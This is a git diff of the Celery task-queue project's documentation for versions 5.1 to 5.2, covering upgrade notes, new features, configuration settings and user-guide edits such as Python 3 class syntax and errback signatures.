+Omer Katz
+pavlos kallis
+Pavol Plaskoň
+Pengjie Song (宋鹏捷)
+Sardorbek Imomaliev
+Sergey Lyapustin
+Sergey Tikhonov
+Stephen J. Fuhry
+Swen Kooij
+tned73
+Tomas Hrnciar
+tumb1er
+
+.. note::
+
+ This wall was automatically generated from git history,
+ so sadly it doesn't not include the people who help with more important
+ things like answering mailing-list questions.
+
+Upgrading from Celery 4.x
+=========================
+
+Step 1: Adjust your command line invocation
+-------------------------------------------
+
+Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible.
+
+The global options can no longer be positioned after the sub-command.
+Instead, they must be positioned as an option for the `celery` command like so::
+
+ celery --app path.to.app worker
+
+If you were using our :ref:`daemonizing` guide to deploy Celery in production,
+you should revisit it for updates.
+
+Step 2: Update your configuration with the new setting names
+------------------------------------------------------------
+
+If you haven't already updated your configuration when you migrated to Celery 4.0,
+please do so now.
+
+We elected to extend the deprecation period until 6.0 since
+we did not loudly warn about using these deprecated settings.
+
+Please refer to the :ref:`migration guide ` for instructions.
+
+Step 3: Read the important notes in this document
+-------------------------------------------------
+
+Make sure you are not affected by any of the important upgrade notes
+mentioned in the :ref:`following section `.
+
+You should verify that none of the breaking changes in the CLI
+do not affect you. Please refer to :ref:`New Command Line Interface ` for details.
+
+Step 4: Migrate your code to Python 3
+-------------------------------------
+
+Celery 5.x only supports Python 3. Therefore, you must ensure your code is
+compatible with Python 3.
+
+If you haven't ported your code to Python 3, you must do so before upgrading.
+
+You can use tools like `2to3 `_
+and `pyupgrade `_ to assist you with
+this effort.
+
+After the migration is done, run your test suite with Celery 4 to ensure
+nothing has been broken.
+
+Step 5: Upgrade to Celery 5.1
+-----------------------------
+
+At this point you can upgrade your workers and clients with the new version.
+
+.. _v510-important:
+
+Important Notes
+===============
+
+Supported Python Versions
+-------------------------
+
+The supported Python Versions are:
+
+- CPython 3.6
+- CPython 3.7
+- CPython 3.8
+- CPython 3.9
+- PyPy3.6 7.2 (``pypy3``)
+
+Important Notes
+---------------
+
+Kombu
+~~~~~
+
+Starting from v5.1, the minimum required version is Kombu 5.1.0.
+
+Billiard
+~~~~~~~~
+
+Starting from v5.1, the minimum required version is Billiard 3.6.4.
+
+Important Notes From 5.0
+------------------------
+
+Dropped support for Python 2.7 & 3.5
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Celery now requires Python 3.6 and above.
+
+Python 2.7 has reached EOL in January 2020.
+In order to focus our efforts we have dropped support for Python 2.7 in
+this version.
+
+In addition, Python 3.5 has reached EOL in September 2020.
+Therefore, we are also dropping support for Python 3.5.
+
+If you still require to run Celery using Python 2.7 or Python 3.5
+you can still use Celery 4.x.
+However we encourage you to upgrade to a supported Python version since
+no further security patches will be applied for Python 2.7 or
+Python 3.5.
+
+Eventlet Workers Pool
+~~~~~~~~~~~~~~~~~~~~~
+
+Due to `eventlet/eventlet#526 `_
+the minimum required version is eventlet 0.26.1.
+
+Gevent Workers Pool
+~~~~~~~~~~~~~~~~~~~
+
+Starting from v5.0, the minimum required version is gevent 1.0.0.
+
+Couchbase Result Backend
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The Couchbase result backend now uses the V3 Couchbase SDK.
+
+As a result, we no longer support Couchbase Server 5.x.
+
+Also, starting from v5.0, the minimum required version
+for the database client is couchbase 3.0.0.
+
+To verify that your Couchbase Server is compatible with the V3 SDK,
+please refer to their `documentation `_.
+
+Riak Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The Riak result backend has been removed as the database is no longer maintained.
+
+The Python client only supports Python 3.6 and below which prevents us from
+supporting it and it is also unmaintained.
+
+If you are still using Riak, refrain from upgrading to Celery 5.0 while you
+migrate your application to a different database.
+
+We apologize for the lack of notice in advance but we feel that the chance
+you'll be affected by this breaking change is minimal which is why we
+did it.
+
+AMQP Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The AMQP result backend has been removed as it was deprecated in version 4.0.
+
+Removed Deprecated Modules
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The `celery.utils.encoding` and the `celery.task` modules has been deprecated
+in version 4.0 and therefore are removed in 5.0.
+
+If you were using the `celery.utils.encoding` module before,
+you should import `kombu.utils.encoding` instead.
+
+If you were using the `celery.task` module before, you should import directly
+from the `celery` module instead.
+
+If you were using `from celery.task import Task` you should use
+`from celery import Task` instead.
+
+If you were using the `celery.task` decorator you should use
+`celery.shared_task` instead.
+
+
+`azure-servicebus` 7.0.0 is now required
+----------------------------------------
+
+Given the SDK changes between 0.50.0 and 7.0.0 Kombu deprecates support for
+older `azure-servicebus` versions.
+
+.. _v510-news:
+
+News
+====
+
+Support for Azure Service Bus 7.0.0
+-----------------------------------
+
+With Kombu v5.1.0 we now support Azure Services Bus.
+
+Azure have completely changed the Azure ServiceBus SDK between 0.50.0 and 7.0.0.
+`azure-servicebus >= 7.0.0` is now required for Kombu `5.1.0`
+
+Add support for SQLAlchemy 1.4
+------------------------------
+
+Following the changes in SQLAlchemy 1.4, the declarative base is no
+longer an extension.
+Importing it from sqlalchemy.ext.declarative is deprecated and will
+be removed in SQLAlchemy 2.0.
+
+Support for Redis username authentication
+-----------------------------------------
+
+Previously, the username was ignored from the URI.
+Starting from Redis>=6.0, that shouldn't be the case since ACL support has landed.
+
+Please refer to the :ref:`documentation <_conf-redis-result-backend>` for details.
+
+SQS transport - support back off policy
+----------------------------------------
+
+SQS now supports managed visibility timeout. This lets us implement a back off
+policy (for instance, an exponential policy) which means that the time between
+task failures will dynamically change based on the number of retries.
+
+Documentation: :doc:`reference/kombu.transport.SQS.rst`
+
+Duplicate successful tasks
+---------------------------
+
+The trace function fetches the metadata from the backend each time it
+receives a task and compares its state. If the state is SUCCESS,
+we log and bail instead of executing the task.
+The task is acknowledged and everything proceeds normally.
+
+Documentation: :setting:`worker_deduplicate_successful_tasks`
+
+Terminate tasks with late acknowledgment on connection loss
+-----------------------------------------------------------
+
+Tasks with late acknowledgement keep running after restart,
+although the connection is lost and they cannot be
+acknowledged anymore. These tasks will now be terminated.
+
+Documentation: :setting:`worker_cancel_long_running_tasks_on_connection_loss`
+
+`task.apply_async(ignore_result=True)` now avoids persisting the result
+-----------------------------------------------------------------------
+
+`task.apply_async` now supports passing `ignore_result` which will act the same
+as using ``@app.task(ignore_result=True)``.
+
+Use a thread-safe implementation of `cached_property`
+-----------------------------------------------------
+
+`cached_property` is heavily used in celery but it is causing
+issues in multi-threaded code since it is not thread safe.
+Celery is now using a thread-safe implementation of `cached_property`.
+
+Tasks can now have required kwargs at any order
+------------------------------------------------
+
+Tasks can now be defined like this:
+
+.. code-block:: python
+
+ from celery import shared_task
+
+ @shared_task
+ def my_func(*, name='default', age, city='Kyiv'):
+ pass
+
+
+SQS - support STS authentication with AWS
+-----------------------------------------
+
+The STS token requires a refresh after a certain period of time.
+After `sts_token_timeout` is reached, a new token will be created.
+
+Documentation: :doc:`getting-started/backends-and-brokers/sqs.rst`
+
+Support Redis `health_check_interval`
+-------------------------------------
+
+`health_check_interval` can be configured and will be passed to `redis-py`.
+
+Documentation: :setting:`redis_backend_health_check_interval`
+
+
+Update default pickle protocol version to 4
+--------------------------------------------
+
+The pickle protocol version was updated to allow Celery to serialize larger
+strings among other benefits.
+
+See: https://docs.python.org/3.9/library/pickle.html#data-stream-format
+
+
+Support Redis Sentinel with SSL
+-------------------------------
+
+See documentation for more info:
+:doc:`getting-started/backends-and-brokers/redis.rst`
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 0ba1f965b3f..a5a59d9b467 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.0.0 (cliffs)
+:Version: 5.2.2 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -37,16 +37,13 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 4.4 runs on,
+Celery version 5.1.x runs on,
-- Python (2.7, 3.5, 3.6, 3.7, 38)
-- PyPy2.7 (7.3)
-- PyPy3.5 (7.1)
-- PyPy3.6 (7.3)
+- Python 3.6 or newer versions
+- PyPy3.6 (7.3) or newer
-This is the last version to support Python 2.7,
-and from the next version (Celery 5.x) Python 3.6 or newer is required.
+From the next major version (Celery 6.x) Python 3.7 or newer is required.
If you're running an older version of Python, you need to be running
an older version of Celery:
@@ -71,7 +68,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 4.0 coming from previous versions then you should read our
+new to Celery 5.0.x or 5.1.x coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/docs/includes/resources.txt b/docs/includes/resources.txt
index 1afe96e546d..07681a464d7 100644
--- a/docs/includes/resources.txt
+++ b/docs/includes/resources.txt
@@ -18,10 +18,10 @@ please join the `celery-users`_ mailing list.
IRC
---
-Come chat with us on IRC. The **#celery** channel is located at the `Freenode`_
+Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_
network.
-.. _`Freenode`: https://freenode.net
+.. _`Libera Chat`: https://freenode.net
.. _bug-tracker:
diff --git a/docs/index.rst b/docs/index.rst
index 2a9de61c06d..915b7c088aa 100644
--- a/docs/index.rst
+++ b/docs/index.rst
@@ -58,7 +58,7 @@ Contents
tutorials/index
faq
changelog
- whatsnew-5.0
+ whatsnew-5.2
reference/index
internals/index
history/index
diff --git a/docs/internals/app-overview.rst b/docs/internals/app-overview.rst
index a46021e105b..965a148cca2 100644
--- a/docs/internals/app-overview.rst
+++ b/docs/internals/app-overview.rst
@@ -100,18 +100,7 @@ Deprecated
Aliases (Pending deprecation)
=============================
-* ``celery.task.base``
- * ``.Task`` -> {``app.Task`` / :class:`celery.app.task.Task`}
-
-* ``celery.task.sets``
- * ``.TaskSet`` -> {``app.TaskSet``}
-
-* ``celery.decorators`` / ``celery.task``
- * ``.task`` -> {``app.task``}
-
* ``celery.execute``
- * ``.apply_async`` -> {``task.apply_async``}
- * ``.apply`` -> {``task.apply``}
* ``.send_task`` -> {``app.send_task``}
* ``.delay_task`` -> *no alternative*
@@ -146,14 +135,6 @@ Aliases (Pending deprecation)
* ``.get_queues`` -> {``app.amqp.get_queues``}
-* ``celery.task.control``
- * ``.broadcast`` -> {``app.control.broadcast``}
- * ``.rate_limit`` -> {``app.control.rate_limit``}
- * ``.ping`` -> {``app.control.ping``}
- * ``.revoke`` -> {``app.control.revoke``}
- * ``.discard_all`` -> {``app.control.discard_all``}
- * ``.inspect`` -> {``app.control.inspect``}
-
* ``celery.utils.info``
* ``.humanize_seconds`` -> ``celery.utils.time.humanize_seconds``
* ``.textindent`` -> ``celery.utils.textindent``
@@ -176,7 +157,7 @@ is missing.
from celery.app import app_or_default
- class SomeClass(object):
+ class SomeClass:
def __init__(self, app=None):
self.app = app_or_default(app)
diff --git a/docs/internals/deprecation.rst b/docs/internals/deprecation.rst
index 222dd6644d9..23d03ad36f7 100644
--- a/docs/internals/deprecation.rst
+++ b/docs/internals/deprecation.rst
@@ -34,7 +34,7 @@ Compat Task Modules
from celery import task
-- Module ``celery.task`` *may* be removed (not decided)
+- Module ``celery.task`` will be removed
This means you should change:
@@ -44,10 +44,21 @@ Compat Task Modules
into:
+ .. code-block:: python
+
+ from celery import shared_task
+
+ -- and:
.. code-block:: python
from celery import task
+ into:
+
+ .. code-block:: python
+
+ from celery import shared_task
+
-- and:
.. code-block:: python
diff --git a/docs/internals/guide.rst b/docs/internals/guide.rst
index e7d600da275..731cacbaac4 100644
--- a/docs/internals/guide.rst
+++ b/docs/internals/guide.rst
@@ -53,10 +53,10 @@ Naming
pass
# - "action" class (verb)
- class UpdateTwitterStatus(object): # BAD
+ class UpdateTwitterStatus: # BAD
pass
- class update_twitter_status(object): # GOOD
+ class update_twitter_status: # GOOD
pass
.. note::
@@ -71,7 +71,7 @@ Naming
.. code-block:: python
- class Celery(object):
+ class Celery:
def consumer_factory(self): # BAD
...
@@ -89,7 +89,7 @@ as this means that they can be set by either instantiation or inheritance.
.. code-block:: python
- class Producer(object):
+ class Producer:
active = True
serializer = 'json'
@@ -130,7 +130,7 @@ the exception class from the instance directly.
class Empty(Exception):
pass
- class Queue(object):
+ class Queue:
Empty = Empty
def get(self):
@@ -157,7 +157,7 @@ saved us from many a monkey patch).
.. code-block:: python
- class Worker(object):
+ class Worker:
Consumer = Consumer
def __init__(self, connection, consumer_cls=None):
diff --git a/docs/internals/protocol.rst b/docs/internals/protocol.rst
index 196077213c8..72f461dc936 100644
--- a/docs/internals/protocol.rst
+++ b/docs/internals/protocol.rst
@@ -49,6 +49,7 @@ Definition
'argsrepr': str repr(args),
'kwargsrepr': str repr(kwargs),
'origin': str nodename,
+ 'replaced_task_nesting': int
}
body = (
@@ -168,7 +169,7 @@ Changes from version 1
def apply_async(self, args, kwargs, **options):
fun, real_args = self.unpack_args(*args)
- return super(PickleTask, self).apply_async(
+ return super().apply_async(
(fun, real_args, kwargs), shadow=qualname(fun), **options
)
diff --git a/docs/make.bat b/docs/make.bat
index a75aa4e2866..045f00bf8c5 100644
--- a/docs/make.bat
+++ b/docs/make.bat
@@ -19,6 +19,7 @@ if "%1" == "help" (
:help
echo.Please use `make ^` where ^ is one of
echo. html to make standalone HTML files
+ echo. livehtml to start a local server hosting the docs
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
@@ -269,4 +270,9 @@ if "%1" == "pseudoxml" (
goto end
)
+if "%1" == "livehtml" (
+ sphinx-autobuild -b html --open-browser -p 7000 --watch %APP% -c . %SOURCEDIR% %BUILDDIR%/html
+ goto end
+)
+
:end
diff --git a/docs/reference/celery.bin.amqp.rst b/docs/reference/celery.bin.amqp.rst
deleted file mode 100644
index 8de8bf00de7..00000000000
--- a/docs/reference/celery.bin.amqp.rst
+++ /dev/null
@@ -1,11 +0,0 @@
-===========================================================
- ``celery.bin.amqp``
-===========================================================
-
-.. contents::
- :local:
-.. currentmodule:: celery.bin.amqp
-
-.. automodule:: celery.bin.amqp
- :members:
- :undoc-members:
diff --git a/docs/reference/cli.rst b/docs/reference/cli.rst
index cff2291d4ed..6432b7e300a 100644
--- a/docs/reference/cli.rst
+++ b/docs/reference/cli.rst
@@ -4,4 +4,4 @@
.. click:: celery.bin.celery:celery
:prog: celery
- :show-nested:
+ :nested: full
diff --git a/docs/userguide/application.rst b/docs/userguide/application.rst
index 1e6c4cf13ae..502353d1013 100644
--- a/docs/userguide/application.rst
+++ b/docs/userguide/application.rst
@@ -257,7 +257,7 @@ You can then specify the configuration module to use via the environment:
.. code-block:: console
- $ CELERY_CONFIG_MODULE="celeryconfig.prod" celery worker -l info
+ $ CELERY_CONFIG_MODULE="celeryconfig.prod" celery worker -l INFO
.. _app-censored-config:
@@ -360,19 +360,15 @@ Finalizing the object will:
.. topic:: The "default app"
Celery didn't always have applications, it used to be that
- there was only a module-based API, and for backwards compatibility
- the old API is still there until the release of Celery 5.0.
+ there was only a module-based API. A compatibility API was
+ available at the old location until the release of Celery 5.0,
+ but has been removed.
Celery always creates a special app - the "default app",
and this is used if no custom application has been instantiated.
- The :mod:`celery.task` module is there to accommodate the old API,
- and shouldn't be used if you use a custom app. You should
- always use the methods on the app instance, not the module based API.
-
- For example, the old Task base class enables many compatibility
- features where some may be incompatible with newer features, such
- as task methods:
+ The :mod:`celery.task` module is no longer available. Use the
+ methods on the app instance, not the module based API:
.. code-block:: python
@@ -380,9 +376,6 @@ Finalizing the object will:
from celery import Task # << NEW base class.
- The new base class is recommended even if you use the old
- module-based API.
-
Breaking the chain
==================
@@ -400,7 +393,7 @@ The following example is considered bad practice:
from celery import current_app
- class Scheduler(object):
+ class Scheduler:
def run(self):
app = current_app
@@ -409,7 +402,7 @@ Instead it should take the ``app`` as an argument:
.. code-block:: python
- class Scheduler(object):
+ class Scheduler:
def __init__(self, app):
self.app = app
@@ -421,7 +414,7 @@ so that everything also works in the module-based compatibility API
from celery.app import app_or_default
- class Scheduler(object):
+ class Scheduler:
def __init__(self, app=None):
self.app = app_or_default(app)
@@ -431,7 +424,7 @@ chain breaks:
.. code-block:: console
- $ CELERY_TRACE_APP=1 celery worker -l info
+ $ CELERY_TRACE_APP=1 celery worker -l INFO
.. topic:: Evolving the API
@@ -456,7 +449,7 @@ chain breaks:
.. code-block:: python
- from celery.task import Task
+ from celery import Task
from celery.registry import tasks
class Hello(Task):
@@ -475,16 +468,16 @@ chain breaks:
.. code-block:: python
- from celery.task import task
+ from celery import app
- @task(queue='hipri')
+ @app.task(queue='hipri')
def hello(to):
return 'hello {0}'.format(to)
Abstract Tasks
==============
-All tasks created using the :meth:`~@task` decorator
+All tasks created using the :meth:`@task` decorator
will inherit from the application's base :attr:`~@Task` class.
You can specify a different base class using the ``base`` argument:
@@ -513,7 +506,7 @@ class: :class:`celery.Task`.
If you override the task's ``__call__`` method, then it's very important
that you also call ``self.run`` to execute the body of the task. Do not
- call ``super().__call__``. The ``__call__`` method of the neutral base
+ call ``super().__call__``. The ``__call__`` method of the neutral base
class :class:`celery.Task` is only present for reference. For optimization,
this has been unrolled into ``celery.app.trace.build_tracer.trace_task``
which calls ``run`` directly on the custom task class if no ``__call__``
diff --git a/docs/userguide/calling.rst b/docs/userguide/calling.rst
index 04c7f9ba718..8bfe52feef4 100644
--- a/docs/userguide/calling.rst
+++ b/docs/userguide/calling.rst
@@ -135,23 +135,18 @@ task that adds 16 to the previous result, forming the expression
You can also cause a callback to be applied if task raises an exception
-(*errback*), but this behaves differently from a regular callback
-in that it will be passed the id of the parent task, not the result.
-This is because it may not always be possible to serialize
-the exception raised, and so this way the error callback requires
-a result backend to be enabled, and the task must retrieve the result
-of the task instead.
+(*errback*). The worker won't actually call the errback as a task, but will
+instead call the errback function directly so that the raw request, exception
+and traceback objects can be passed to it.
This is an example error callback:
.. code-block:: python
@app.task
- def error_handler(uuid):
- result = AsyncResult(uuid)
- exc = result.get(propagate=False)
+ def error_handler(request, exc, traceback):
print('Task {0} raised exception: {1!r}\n{2!r}'.format(
- uuid, exc, result.traceback))
+ request.id, exc, traceback))
it can be added to the task using the ``link_error`` execution
option:
@@ -257,6 +252,31 @@ and timezone information):
>>> tomorrow = datetime.utcnow() + timedelta(days=1)
>>> add.apply_async((2, 2), eta=tomorrow)
+.. warning::
+
+ When using RabbitMQ as a message broker when specifying a ``countdown``
+ over 15 minutes, you may encounter the problem that the worker terminates
+ with an :exc:`~amqp.exceptions.PreconditionFailed` error will be raised:
+
+ .. code-block:: pycon
+
+ amqp.exceptions.PreconditionFailed: (0, 0): (406) PRECONDITION_FAILED - consumer ack timed out on channel
+
+ In RabbitMQ since version 3.8.15 the default value for
+ ``consumer_timeout`` is 15 minutes.
+ Since version 3.8.17 it was increased to 30 minutes. If a consumer does
+ not ack its delivery for more than the timeout value, its channel will be
+ closed with a ``PRECONDITION_FAILED`` channel exception.
+ See `Delivery Acknowledgement Timeout`_ for more information.
+
+ To solve the problem, in RabbitMQ configuration file ``rabbitmq.conf`` you
+ should specify the ``consumer_timeout`` parameter greater than or equal to
+ your countdown value. For example, you can specify a very large value
+ of ``consumer_timeout = 31622400000``, which is equal to 1 year
+ in milliseconds, to avoid problems in the future.
+
+.. _`Delivery Acknowledgement Timeout`: https://www.rabbitmq.com/consumers.html#acknowledgement-timeout
+
.. _calling-expiration:
Expiration
@@ -692,7 +712,7 @@ the workers :option:`-Q ` argument:
.. code-block:: console
- $ celery -A proj worker -l info -Q celery,priority.high
+ $ celery -A proj worker -l INFO -Q celery,priority.high
.. seealso::
@@ -711,13 +731,13 @@ setting or by using the ``ignore_result`` option:
.. code-block:: pycon
- >>> result = add.apply_async(1, 2, ignore_result=True)
+ >>> result = add.apply_async((1, 2), ignore_result=True)
>>> result.get()
None
>>> # Do not ignore result (default)
...
- >>> result = add.apply_async(1, 2, ignore_result=False)
+ >>> result = add.apply_async((1, 2), ignore_result=False)
>>> result.get()
3
diff --git a/docs/userguide/canvas.rst b/docs/userguide/canvas.rst
index fdfcaf2719a..45912a6d2c9 100644
--- a/docs/userguide/canvas.rst
+++ b/docs/userguide/canvas.rst
@@ -569,7 +569,7 @@ Here's an example errback:
def log_error(request, exc, traceback):
with open(os.path.join('/var/errors', request.id), 'a') as fh:
print('--\n\n{0} {1} {2}'.format(
- task_id, exc, traceback), file=fh)
+ request.id, exc, traceback), file=fh)
To make it even easier to link tasks together there's
a special signature called :class:`~celery.chain` that lets
@@ -688,6 +688,52 @@ Group also supports iterators:
A group is a signature object, so it can be used in combination
with other signatures.
+.. _group-callbacks:
+
+Group Callbacks and Error Handling
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Groups can have callback and errback signatures linked to them as well, however
+the behaviour can be somewhat surprising due to the fact that groups are not
+real tasks and simply pass linked tasks down to their encapsulated signatures.
+This means that the return values of a group are not collected to be passed to
+a linked callback signature.
+As an example, the following snippet using a simple `add(a, b)` task is faulty
+since the linked `add.s()` signature will not received the finalised group
+result as one might expect.
+
+.. code-block:: pycon
+
+ >>> g = group(add.s(2, 2), add.s(4, 4))
+ >>> g.link(add.s())
+ >>> res = g()
+ [4, 8]
+
+Note that the finalised results of the first two tasks are returned, but the
+callback signature will have run in the background and raised an exception
+since it did not receive the two arguments it expects.
+
+Group errbacks are passed down to encapsulated signatures as well which opens
+the possibility for an errback linked only once to be called more than once if
+multiple tasks in a group were to fail.
+As an example, the following snippet using a `fail()` task which raises an
+exception can be expected to invoke the `log_error()` signature once for each
+failing task which gets run in the group.
+
+.. code-block:: pycon
+
+ >>> g = group(fail.s(), fail.s())
+ >>> g.link_error(log_error.s())
+ >>> res = g()
+
+With this in mind, it's generally advisable to create idempotent or counting
+tasks which are tolerant to being called repeatedly for use as errbacks.
+
+These use cases are better addressed by the :class:`~celery.chord` class which
+is supported on certain backend implementations.
+
+.. _group-results:
+
Group Results
~~~~~~~~~~~~~
@@ -884,6 +930,12 @@ an errback to the chord callback:
>>> c = (group(add.s(i, i) for i in range(10)) |
... xsum.s().on_error(on_chord_error.s())).delay()
+Chords may have callback and errback signatures linked to them, which addresses
+some of the issues with linking signatures to groups.
+Doing so will link the provided signature to the chord's body which can be
+expected to gracefully invoke callbacks just once upon completion of the body,
+or errbacks just once if any task in the chord header or body fails.
+
.. _chord-important-notes:
Important Notes
@@ -951,7 +1003,7 @@ implemented in other backends (suggestions welcome!).
def after_return(self, *args, **kwargs):
do_something()
- super(MyTask, self).after_return(*args, **kwargs)
+ super().after_return(*args, **kwargs)
.. _canvas-map:
@@ -959,11 +1011,11 @@ Map & Starmap
-------------
:class:`~celery.map` and :class:`~celery.starmap` are built-in tasks
-that calls the task for every element in a sequence.
+that call the provided calling task for every element in a sequence.
-They differ from group in that
+They differ from :class:`~celery.group` in that:
-- only one task message is sent
+- only one task message is sent.
- the operation is sequential.
@@ -1013,7 +1065,7 @@ Chunks
------
Chunking lets you divide an iterable of work into pieces, so that if
-you have one million objects, you can create 10 tasks with hundred
+you have one million objects, you can create 10 tasks with a hundred
thousand objects each.
Some may worry that chunking your tasks results in a degradation
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index 67b3bf96846..52797df39fe 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -107,6 +107,7 @@ have been moved into a new ``task_`` prefix.
``CELERY_REDIS_DB`` :setting:`redis_db`
``CELERY_REDIS_HOST`` :setting:`redis_host`
``CELERY_REDIS_MAX_CONNECTIONS`` :setting:`redis_max_connections`
+``CELERY_REDIS_USERNAME`` :setting:`redis_username`
``CELERY_REDIS_PASSWORD`` :setting:`redis_password`
``CELERY_REDIS_PORT`` :setting:`redis_port`
``CELERY_REDIS_BACKEND_USE_SSL`` :setting:`redis_backend_use_ssl`
@@ -115,7 +116,7 @@ have been moved into a new ``task_`` prefix.
``CELERY_MESSAGE_COMPRESSION`` :setting:`result_compression`
``CELERY_RESULT_EXCHANGE`` :setting:`result_exchange`
``CELERY_RESULT_EXCHANGE_TYPE`` :setting:`result_exchange_type`
-``CELERY_TASK_RESULT_EXPIRES`` :setting:`result_expires`
+``CELERY_RESULT_EXPIRES`` :setting:`result_expires`
``CELERY_RESULT_PERSISTENT`` :setting:`result_persistent`
``CELERY_RESULT_SERIALIZER`` :setting:`result_serializer`
``CELERY_RESULT_DBURI`` Use :setting:`result_backend` instead.
@@ -146,8 +147,9 @@ have been moved into a new ``task_`` prefix.
``CELERY_SEND_SENT_EVENT`` :setting:`task_send_sent_event`
``CELERY_SERIALIZER`` :setting:`task_serializer`
``CELERYD_SOFT_TIME_LIMIT`` :setting:`task_soft_time_limit`
+``CELERY_TASK_TRACK_STARTED`` :setting:`task_track_started`
+``CELERY_TASK_REJECT_ON_WORKER_LOST`` :setting:`task_reject_on_worker_lost`
``CELERYD_TIME_LIMIT`` :setting:`task_time_limit`
-``CELERY_TRACK_STARTED`` :setting:`task_track_started`
``CELERYD_AGENT`` :setting:`worker_agent`
``CELERYD_AUTOSCALER`` :setting:`worker_autoscaler`
``CELERYD_CONCURRENCY`` :setting:`worker_concurrency`
@@ -317,7 +319,7 @@ instead of a dict to choose the tasks to annotate:
.. code-block:: python
- class MyAnnotate(object):
+ class MyAnnotate:
def annotate(self, task):
if task.name.startswith('tasks.'):
@@ -426,6 +428,23 @@ propagate exceptions.
It's the same as always running ``apply()`` with ``throw=True``.
+.. setting:: task_store_eager_result
+
+``task_store_eager_result``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. versionadded:: 5.1
+
+Default: Disabled.
+
+If this is :const:`True` and :setting:`task_always_eager` is :const:`True`
+and :setting:`task_ignore_result` is :const:`False`,
+the results of eagerly executed tasks will be saved to the backend.
+
+By default, even with :setting:`task_always_eager` set to :const:`True`
+and :setting:`task_ignore_result` set to :const:`False`,
+the result will not be saved.
+
.. setting:: task_remote_tracebacks
``task_remote_tracebacks``
@@ -465,7 +484,7 @@ you can set :setting:`task_store_errors_even_if_ignored`.
Default: Disabled.
If set, the worker stores all task errors in the result store even if
-:attr:`Task.ignore_result ` is on.
+:attr:`Task.ignore_result ` is on.
.. setting:: task_track_started
@@ -836,6 +855,28 @@ Default interval for retrying chord tasks.
.. _conf-database-result-backend:
+
+.. setting:: override_backends
+
+``override_backends``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: Disabled by default.
+
+Path to class that implements backend.
+
+Allows to override backend implementation.
+This can be useful if you need to store additional metadata about executed tasks,
+override retry policies, etc.
+
+Example:
+
+.. code-block:: python
+
+ override_backends = {"db": "custom_module.backend.class"}
+
+
+
Database backend settings
-------------------------
@@ -1028,9 +1069,13 @@ setting:
``cache_backend``
~~~~~~~~~~~~~~~~~
-This setting is no longer used as it's now possible to specify
+This setting is no longer used in celery's builtin backends as it's now possible to specify
the cache backend directly in the :setting:`result_backend` setting.
+.. note::
+
+ The :ref:`django-celery-results` library uses ``cache_backend`` for choosing django caches.
+
.. _conf-mongodb-result-backend:
MongoDB backend settings
@@ -1105,7 +1150,7 @@ Configuring the backend URL
This backend requires the :setting:`result_backend`
setting to be set to a Redis or `Redis over TLS`_ URL::
- result_backend = 'redis://:password@host:port/db'
+ result_backend = 'redis://username:password@host:port/db'
.. _`Redis over TLS`:
https://www.iana.org/assignments/uri-schemes/prov/rediss
@@ -1120,7 +1165,7 @@ is the same as::
Use the ``rediss://`` protocol to connect to redis over TLS::
- result_backend = 'rediss://:password@host:port/db?ssl_cert_reqs=required'
+ result_backend = 'rediss://username:password@host:port/db?ssl_cert_reqs=required'
Note that the ``ssl_cert_reqs`` string should be one of ``required``,
``optional``, or ``none`` (though, for backwards compatibility, the string
@@ -1132,6 +1177,20 @@ If a Unix socket connection should be used, the URL needs to be in the format:::
The fields of the URL are defined as follows:
+#. ``username``
+
+ .. versionadded:: 5.1.0
+
+ Username used to connect to the database.
+
+ Note that this is only supported in Redis>=6.0 and with py-redis>=3.4.0
+ installed.
+
+ If you use an older database version or an older client version
+ you can omit the username::
+
+ result_backend = 'redis://:password@host:port/db'
+
#. ``password``
Password used to connect to the database.
@@ -1163,6 +1222,22 @@ Note that the ``ssl_cert_reqs`` string should be one of ``required``,
``optional``, or ``none`` (though, for backwards compatibility, the string
may also be one of ``CERT_REQUIRED``, ``CERT_OPTIONAL``, ``CERT_NONE``).
+
+.. setting:: redis_backend_health_check_interval
+
+.. versionadded:: 5.1.0
+
+``redis_backend_health_check_interval``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: Not configured
+
+The Redis backend supports health checks. This value must be
+set as an integer whose value is the number of seconds between
+health checks. If a ConnectionError or a TimeoutError is
+encountered during the health check, the connection will be
+re-established and the command retried exactly once.
+
.. setting:: redis_backend_use_ssl
``redis_backend_use_ssl``
@@ -1507,6 +1582,19 @@ Default: celery.
The name for the storage container in which to store the results.
+.. setting:: azureblockblob_base_path
+
+``azureblockblob_base_path``
+~~~~~~~~~~~~~~~~~~~
+
+.. versionadded:: 5.1
+
+Default: None.
+
+A base path in the storage container to use to store result keys. For example::
+
+ azureblockblob_base_path = 'prefix/'
+
.. setting:: azureblockblob_retry_initial_backoff_sec
``azureblockblob_retry_initial_backoff_sec``
@@ -1533,6 +1621,24 @@ Default: 3.
The maximum number of retry attempts.
+.. setting:: azureblockblob_connection_timeout
+
+``azureblockblob_connection_timeout``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: 20.
+
+Timeout in seconds for establishing the azure block blob connection.
+
+.. setting:: azureblockblob_read_timeout
+
+``azureblockblob_read_timeout``
+~~~~~~~~~~~~~~~~~~~~
+
+Default: 120.
+
+Timeout in seconds for reading of an azure block blob.
+
